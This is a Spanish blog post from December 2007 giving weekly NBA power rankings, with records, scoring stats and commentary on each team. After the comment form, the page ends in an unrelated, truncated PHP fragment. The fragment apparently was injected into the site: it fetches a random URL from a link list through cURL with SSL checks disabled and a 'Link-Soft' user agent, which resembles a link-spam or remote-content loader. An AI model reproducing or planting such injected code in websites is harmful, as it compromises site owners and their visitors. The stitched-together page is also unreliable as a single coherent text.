El termómetro de la NBA

04 de December de 2007 por telekoman

Esta semana hemos visto de todo en la NBA. Buenos momentos, como los choques entre pivots de la talla de Dwight Howard, Amare Stoudemire y Andrew Bynum o la lucha por ser el mejor base entre Chris Paul y Deron Williams (con permiso de Nash y Kidd, por supuesto) o las grandes victorias de uns Golden State Warriors que se han mostrado intratables. También hemos visto malos momentos, como el ridículo vivido en la cancha de Boston donde los Knicks no fueron capaces de llegar a 60 puntos y perdieron frente a los Celtics por 45 puntos de diferencia, los dientes de menos que se llevó Tyson Chandler a su casa o la fea lesión de Tim Duncan

Debemos destacar a dos jugadores españoles que lo están haciendo realmente bien. Calderón ha demostrado esta semana que podría ser el base titular de más de la mitad de los equipos de esta liga y que no tiene nada que envidiar a nadie en cuestión de dirección de juego. Navarro por su parte ha aceptado de buen grado los galones de titular que le ha brindado Iavaroni a raíz de la lesión de Milicic y con más de 30 minutos por partido ha demostrado que debe ser una referencia en el juego de ataque de su equipo. Los entrenadores rivales ya se fijan en él como una amenaza real.

Equipos que más suben: Golden State Warriors (10), Indiana Pacers (6)

Equipos que más bajan: Milwaukee Bucks (7), New York Knicks (5), Cleveland Cavaliers (4)

Equipo (Posición anterior) Balance Ataque / Defensa Comentario

1

San Antonio (1)

15 – 3 101,6 (10) / 92,1 (2) La lesión de Duncan en el último choque de la semana frente a Portland es lo que a día de hoy mantiene en vilo a los aficionados de San Antonio y del resto de la NBA. Sin conocerse aún el alcance de la lesión es arriegado aventurarse a dar un pronóstico. Sus compañeros mantuvieron el tipo y ganaron de todas formas. Con Ginobili con todas las papeletas para ser nombrado 6º Hombre y Parker en plan estrella, esta semana que viene, con sólo 2 partidos en casa ante Utah y Dallas se antoja importante en caso de confirmarse los peores augurios.

2

Orlando (2)

15 – 4 103,5 (7) / 96,5 (11)

Esta semana el duelo de Howard ha sido con Amare Stoudamire y con Bynum. En el primero ganó Howard, pero perdió Orlando y en el segundo ganó Bynum (vale, con ayuda de Odom) pero terminaron ganando gracias a Lewis y Turkoglu. Este equipo tiene alternativas y se ha convertido en un candidato fijo para ganar el título de Conferencia en el Este.


3

Boston (3)

14 – 2 100,9 (12) / 87,4 (1) Lebron James consiguió poner un 2 en la casilla de derrotas de Boston a principio de semana, pero en el siguiente enfrentamiento a finales de semana, con King James lesionado, la tortilla se dio la vuelta sin piedad. Los Celtics no están jugando su mejor juego, pero ganan con una facilidad que asusta. Y si no que pregunten en New York. Siguen invictos en casa tras 9 partidos y la visita de Toronto no parece preocupar en exceso.

4

Phoenix (4)

13 – 4

108,4 (2) / 102,7 (25) Curiosa semana para los Suns, que empezaron perdiendo en un partido a correr contra los Warriors, siguieron perdiendo contra los irregulares Houston con un Yao imparable y ganaron a Orlando en un partido en el que no pudieron nunca con Howard. El último partido contra los Knicks era de regalo. La mejor noticia para Phoenix es el gran estado de forma de un Grant Hill que por momentos se parece al de Detroit. Esta semana 4 partidos fuera de casa pero seguro que al finalizar seguirán estando arriba.

5

Utah (5)

12 – 5

106,9 (3) / 98,1 (14)

Lo mejor de la semana ocurrió contra los Lakers. Sin Boozer ni Okur, los Jazz, de la mano de Deron Williams que anotó 35 puntos y de un triple doble de Kirilenko se merendaron a Kobe y unos amigos. Odom todavía tiene pesadillas. Queda una semana cargadita, recibiendo a Miami y con la visita a Sacramento, San Antonio y Dallas y con la duda de la participación de Boozer y Okur.

6

New Orleans (6)

12 – 6 96,8 (18) / 93,3 (4)

Los Hornets se mantienen en una buena posición tras haber ganado 2 de los 3 encuentros que han disputado. Su quinteto inicial, muy equilibrado, es de los mejores de la liga. Y tienen a Stojakovic, que lleva la friolera de 43 triples en lo que va de temporada. Les sigue faltando algo de mordiente, en especial a Chandler, que se dejó 2 de sus dientes en el último partido.


7

Detroit (9)

11 – 5 100,7 (13) / 92,7 (3) Semana perfecta para Detroit que ha ganado sus 3 encuentros con una diferencia de 26 puntos de media, incluyendo los 35 de ventaja que obtuvieron contra Cleveland. Que los Pistons estén entre los equipos que menos puntos reciben es normal, pero que encabecen la clasificación de puntos anotados no es nada fácil de ver. Esta semana, y haciendo gala de un gran banquillo, ha sido capaz de recuperar 2 puestos en nuestra lista. Veremos si son capaces de mantener la máquina engrasada frente a Atlanta, New Horleans, Chicago y Charlotte

8

Dallas (7)

11 – 6 102,5 (8) / 98,1 (15) Tras la derrota al principios de semana frente a Washington, Avery Johnson decidió dar un cambio de rumbo y volver a la estrategia que tantos partidos le hizo ganar la temporada pasada, abandonando momentáneamente el experimiento de llevar a Terry y Dampier a la segunda unidad. Parece que le ha dado cierto resultado, aunque la derrota frente a New Orleans no permite asegurarlo del todo. Posiblemente si Nowitzky estuviera al nivel del año pasado no estaríamos hablando de esto. Veremos si consigue lo que busca tras sus partidos contra Chicago, San Antonio, Denver o Utah.

9

Denver (8)

11 – 7 106,6 (4) / 102,1 (23)

Denver parece estar disputando a Houston e Indiana el título de “Equipos más irregulares”. Es realmente difícil perder con los Lakers de 28 puntos y ganarle a Miami de 26. Pero es lo que se obtiene cuando juntas a dos jugadores de la calidad y el ego de Allen Iverson y Carmelo Anthony. En este equipo sólo defiende Marcus Camby. Esta semana nuevamente frente a los Lakers, visitando Dallas y recibiendo a los Kings, cualquier cosa puede pasar, pero casi seguro no será ni un 3-0 ni un 0-3.


10

Golden State (20)

9 – 7 108,6 (1) / 107,1 (29) Esta semana han jugado el papel de actor principal de liga ya que han sido los únicos capaces de ganar los 4 partidos que han tenido. Y no eran fáciles precisamente. Sus señas de identidad no han cambiado mucho. Siguen siendo un ataque fluido, con un gran Baron Davis al mando de las operaciones al que ahora se ha sumando un Monta Ellis dispuesto a demostrar sus grandes cualidades. Y ahora hasta defienden algo más. Consiguieron dejar a McGrady y a Yao en 21 puntos entre los dos. Mucho mérito. Veremos si pueden en casa con Orlando.

11

L.A. Lakers (12)

9 – 8 105,5 (5) / 102,0 (21) Varios apuntes importantes esta semana. Bynum se está confirmando como un gran pivot, capaz de anotar y rebotear con cierta fluidez, lo cual llena de esperanza a los aficionados amarillos. Odom está profundamente perdido. Es capaz de hacer grandes actuaciones como ante Orlando (aunque se perdiera al final) ayudando a sujetar a Dwight Howard y grandes decepciones como ante Utah, donde Kirilenko le puso en rídiculo. Y a todo esto el maestro Zen renovado por 2 años.

12

Toronto (13)

9 – 8 98,7 (16) / 94,8 (8) Toronto está sufriendo este año una pequeña plaga de lesiones que están mermando en parte sus posibilidades. El último en caer ha sido Chris Bosh. Y sin embargo los resultados no se han resentido en exceso gracias en parte a la buena actuación en la dirección de Calderón. El de Villanueva de la Serena ha acumulado dobles dobles saliendo desde el inicio. Ante la baja de Bosh, el jugador decisivo, para bien y para mal, está siendo Bargnani. Pero siguen teniendo graves carencias interiores.

13

Indiana (19)

9 – 9 102,2 (9) / 103,6 (26) Por fin volvió O’Neal, … y su equipo perdió frente a Seattle. Pero parece que ha vuelto más enchufado y en la noche siguiente frente a los Clippers dio todo un recital con 20 puntos y 15 rebotes y acaparando mucho juego interior para que Tinsley pudiera hincarse a meter triples y llegar a 29 puntos. Falta ver si son capaces de mantener el juego varios partidos.

14

Cleveland (10)

9 – 9 97,6 (17) / 101,2 (19) Mala semana para Cleveland. Y eso que empezaba bien al vencer nada más y nada menos que a Boston por 5 puntos. La lesión de LeBron James frente a Detroit, y el rodillo que les pasó por encima, no ha sentado nada bien a los Cavaliers, que no han conseguido ganar ninguno de los 2 partidos posteriores. Este año es complicado que lleguen donde llegaron el año pasado si no acompañan un poco más a su líder.

15

Houston (14)

9 – 9 95,5 (19) / 94,1 (6)

Esta bastante claro que a Houston este año le falta algo para que se le pueda declarar en el grupo de los favoritos. Son capaces de ganar a cualquiera (teniendo a Yao y McGrady es fácil) pero también son capaces de perder casi con cualquiera. Tras ganar a Phoenix, fueron literalmente pasados por encima por uns Golden State Warriors utilizando el arma que estos menos dominan, la defensa. El resto del equipo casi no aporta y eso seguro que les va a pasar factura cuando las cosas se pongan serias. Veremos si ante equipos del Este tienen un poco más de fortuna.


16

Washington (17)

8 – 9 101,3 (11) / 101,6 (20) Butler y Jamison siguen a buen ritmo pero el equipo sigue combinando buenas actuaciones y derrotas absurdas como ante Philadelphia. Falta claramente algo de dirección y un juego interior un poco más potente. Esta semana se quedan en casa y reciben a Cleveland, Phoenix y New Jersey, con lo que les volveremos a ver por el medio de la tabla.

17

New Jersey (15)

8 – 9 90,0 (28) / 97,2 (13) La vuelta de Carter a la titularidad tras su lesión y la baja de Krstic ha marcado la semana de los Nets. Los Nets, a priori uno de los favoritos del Este siguen sin hacer un buen baloncesto y se mantienen gracias a un Jefferson que empieza a bajar sus prestaciones y a Mr. Triple Doble Kidd. La vuelta de Carter al quinteto inicial debería mejorar el panorama, pero en la primera oportunidad han caído de 23 frente a unos imponentes Pistons.

18

Milwaukee (11)

7 – 8 95,4 (20) / 99,7 (17)

Semana nefasta para los Milwaukee Bucks que no han sido capaces de ganar ninguno de sus 4 partidos. Las diferencias no han sido grandes pero la falta de recursos ha sido evidente. Para redondear la faena esta semana se van de gira por el Oeste para visitar a Clippers, Warriors, Sonics y Trail Blazers.


19

L.A. Clippers (16)

6 – 9 95,3 (21) / 100,6 (18) Ya decíamos la semana pasada que las lesiones iban a ser muy importantes este año para la plantilla angelina, y así ha sido. Tan solo Kaman parece mantenerse alejado de ellas y mantiene una línea constante, como los 22 puntos, 22 rebotes y 5 tapones del partido contra Indiana. Pero en cada partido sólo encuentra la ayuda de uno de sus compañeros y ganar así es difícil. Parece que Maggette ya está disponible, lo que deberá incrementar las prestaciones de la plantilla.

20

Atlanta (21)

6 – 9 93,8 (23) / 95,9 (10) Su juventud les hace defender bien y tener a Al Horford en tus filas hace que sí o sí vayas a coger muchos rebotes, pero a los Atlanta Hawks les cuesta Dios y ayuda ganar los partidos. Sus 93,8 puntos de media son excesivamente escasos. Resultado, partidos perdidos por escasa diferencias que podrían haber ganado. Este no es su año, y ellos lo saben, pero si la directiva no hace alguna de sus locuras, su año no está lejos.

21

Charlotte (18)

6 – 9 93,3 (24) / 98,2 (16)

Los Bobcats llegaban a Chicago con la intención de eliminar la malísima racha de 4 derrotas consecutivas. Salieron escaldados y con la 5ª en el zurrón. La caída de prestaciones de Felton, unida a una debilidad en el rebote alarmante está manchando una temporada que había empezado bien. Toronto, Chicago, Cleveland y Detroit serán las siguientes piedras en el camino.


22

Memphis (23)

6 – 10 104,5 (6) / 105,5 (28) La baja de Milicic ha propiciado la titularidad de Juan Carlos Navarro, y este la ha aprovechado con creces, y sería raro no verle en el partido de los novatos y luchando por la segunda plaza del ROY. Pero Memphis es un equipo endeble, con una falta de defensa alarmante y sufre ante equipos con un ataque organizado.

23

Sacramento (24)

6 – 10 99,9 (14) / 103,8 (27) Los Kings han sido uno de los equipos sorpresa de esta semana y han conseguido derrotar tanto a San Antonio como a Houston. La aparición de secundarios como Udrih y la vuelta de Brad Miller han dado un nuevo impulso al equipo de Sacramento que deberá mostrarse más consistente si quiere abandonar la parte baja de la tabla.

24

Philadelphia (26)

5 – 11 91,6 (26) / 94,3 (7)

Los Sixers son un equipo extraño, capaces de hacer buenos partidos y perder y de hacer malos partidos y aún así ganar. Ante Washington se marcaron un espectacular 0 de 14 en triples, y aun así ganaron de 1. La falta de rotación es preocupante y tan sólo Kyle Korver y Louis Williams parecen recambios de garantías para los titulares. Esta semana, con partidos ante Atlanta, Boston y New York por dos veces, puede ser buena y permitirles dejar el último puesto de la división Atlántica


25

Portland (22)

5 – 12 90,5 (27) / 96,8 (12) Uno de los pocos equipos que todavía no ha sido capaz de ganar fuera de casa. Y esta semana ni en casa. Han perdido los 4 encuentros disputados mostrando una falta de dirección tanto dentro como fuera de la cancha impropia de un equipo NBA. Tan solo Lamarcus Aldridge ha mantenido el tipo, acompañado en ocasiones por Webster. Reseñable el partido contra Dallas en el que consiguieron defender bien a Nowitzky, pero se olvidaron de sus compañeros. Teniendo sólo 3 partidos esta semana, deberán aprovechar para intentar corregir el rumbo.

26

Chicago (28)

4 – 10 88,5 (30) / 95,1 (9) Por fin una semana ganadora en Chicago. Es cierto que los rivales no eran nada del otro mundo (Atlanta y Charlotte) pero al menos se ha jugado con más criterio y se ha ganado bien. Tanto Deng como Gordon parecen haber despertado un poco, pero la tarea es dura y no pueden dormirse en los laureles, y más teniendo en cuenta que la semana no apunta nada bueno. Dallas, Charlotte, Boston y Detroit parecen demasiado para el peor ataque de la liga.

27

Miami (28)

4 – 12 88,8 (29) / 93,8 (5)

Miami no levanta cabeza. Ganaron a Charlotte en un buen partido y consiguieron aguantar a los Celtics durante 3 cuartos, pero el esfuerzo se nota en una plantilla que no es joven y fruto del cansancio no opusieron ninguna resistencia a los irregulares Denver.


28

Seattle (29)

3 – 15 98,8 (15) / 107,7 (30) Kevin Durant tiene carta blanca a la hora de tirar. De ahí sus buenas puntuaciones y sus malos porcentajes. Y cuando tu hombre franquicia es el rookie es difícil que ganes. En esta ocasión los habitantes de Seattle consiguieron ver la victoria de su equipo ante Indiana para elevar su cuenta a 3. Deberán tener paciencia.

29

Minnesota (30)

2 – 13 93,0 (25) / 102,0 (21) Un pequeño rayo de esperanza ilumina a los aficionados de Minnesota. Sus bases han aparecido. Tras la lesión de larga duración de Foye, el puesto de base no había estado bien cubierto. Esta semana, tanto Marco Jaric como Sebastian Telfair han dado el paso adelante que su equipo necesita. Ahora solo falta que las buenas actuaciones no sean los días que Jefferson no la mete ni una piscina.

30

New York (25)

5 – 11 94,4 (22) / 102,3 (24)

Seguro que estás pensando “Ey, se han equivocado. New York no debería estar el último de la clasificación.” Puede ser, pero a mi juicio, cualquier equipo NBA que no llegue a anotar 60 puntos, perdiendo de 45 puntos (y gracias) no merece estar por encima de nadie. El ridículo ha sido grande y los aficionados de New York no se lo merecen. Jamal Crawford, en representación de la plantilla, ofreció sus disculpas públicamente al inicio del siguiente partido en el Madison. Y yo me pregunto ¿Y para cuando las disculpas de Isiah Thomas? O mejor aún. ¿Para cuando la dimisión?

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>